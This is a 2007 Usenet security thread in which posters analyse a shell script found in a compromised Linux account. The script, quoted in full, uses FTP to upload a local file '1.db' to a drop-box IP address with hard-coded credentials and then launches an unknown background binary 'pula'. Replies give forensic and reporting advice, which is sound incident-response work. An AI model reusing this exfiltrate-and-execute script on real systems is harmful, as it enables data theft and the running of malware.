Re: Phishing Attempt



Moe Trin wrote:
On Tue, 02 Oct 2007, in the Usenet newsgroup comp.os.linux.security, in article
<47024555$0$15142$afc38c87@xxxxxxxxxxxxxxxxxxxx>, Mark wrote:

Mark wrote:

The account home directory contained a simple shell script of just over
a dozen lines. I can't see what it's doing there.

OK below is the text of the script as it was sent back to me.

Confusion - above you say the script was in the home directory, while
here, you say it was sent back to you. WTF?

I can normally understand shell scripts, but I can't see what this one
is doing.

Your Linux box may only have a soft link from /usr/share/man/man1/sh.1
to something else - probably /usr/share/man/man1/bash.1 - you can follow
that to see what it's doing.

[useless empty lines deleted]

#!/bin/sh
HOST=3D'58.105.225.59'

That sets the variable 'HOST' to the IP address you are posting from.
The '=3D' is a mime abortion which actually translates to an equal sign.

USER=3D'test'
PASSWD=3D'testing'
FILE=3D'1.db'

Setting three more variables - what are the contents of file "1.db" in
this home directory?

=20

More mime crap - actually a space character

ftp -n $HOST <<END_SCRIPT
quote USER $USER
quote PASS $PASSWD
put $FILE
quit
END_SCRIPT

Run the ftp command, connecting to the ftp server on 58.105.225.59,
logging in as user test with password testing, and uploading the file
'1.db' from the current directory on the host this script is run from,
and then quitting.

sleep 70
./pula &

Sleep for 70 seconds, and then run the application 'pula' which is also
in the current directory, putting that application into the background.

'pula' is a city in Croatia (14E/45N), the currency of Botswana (where
it apparently means "rain"), and seems to be some form of windoze worm
or virus that may have originated in Indonesia. I hadn't heard of it
affecting Linux before, and it doesn't show up in the list of malware
searched for in the windoze-wannabe "tools" chkrootkit or rkhunter.
Perhaps you should be looking at that file - starting with the command

Little question: are you implying chkrootkit and rkhunter are, well... snake oil
and totally unnecessary as security tools?
I'm curious, that's all.

file ./pula

if you haven't wiped the directory already.

exit 0

That's the end of the script. Not knowing what's in the 'pula' file,
it's not possible to say what's going on, but this thing you quoted
seems to be running the 'pula' file, sleeping for 70 seconds. It's
also ftp'ing a file named '1.db' to the ftp account 'test' on the host
58.105.225.59. Did you look to see what is in there?

Actually, this looks more as if the host 58.105.225.59 is/was being used
as a 'drop-box', and you may find it useful searching that system to see
where the files are going. It _could_ be that another computer elsewhere
was connecting to the ftp server on 58.105.225.59 using the same account
name/password, and 'get'ing (and perhaps removing) the file, in which
case the only evidence might be in the (non-existent) ftp server logs.

Old guy

I would recommend taking an image of the system and sending it to
a computer security group like the FBI or something (I don't know where you're from).
You could also let your system just run and increase logging (sort of turning this system into an
evidence-collecting machine) by applying some iptables rules and editing syslog.conf.

The hacker doesn't seem to be very skilled, but do some more exploring before concluding this. Also
install the same system on another machine, index system tools by taking md5sums, and check them on the
compromised machine.

In fact this should be the first thing you do, since then you could determine if
setting up this system as a honeypot has any merit. If there is evidence of tampering with system tools,
any logging cannot be trusted anymore! You should also check for unusual *** in .bash_history, ...
and /var/log/pacct if process accounting was enabled.

After some valuable and correct info has been collected, send all of it to your government's cybercrime unit.

I'm sorry if this reply doesn't make sense. It's pretty late and I'm not a native English speaker.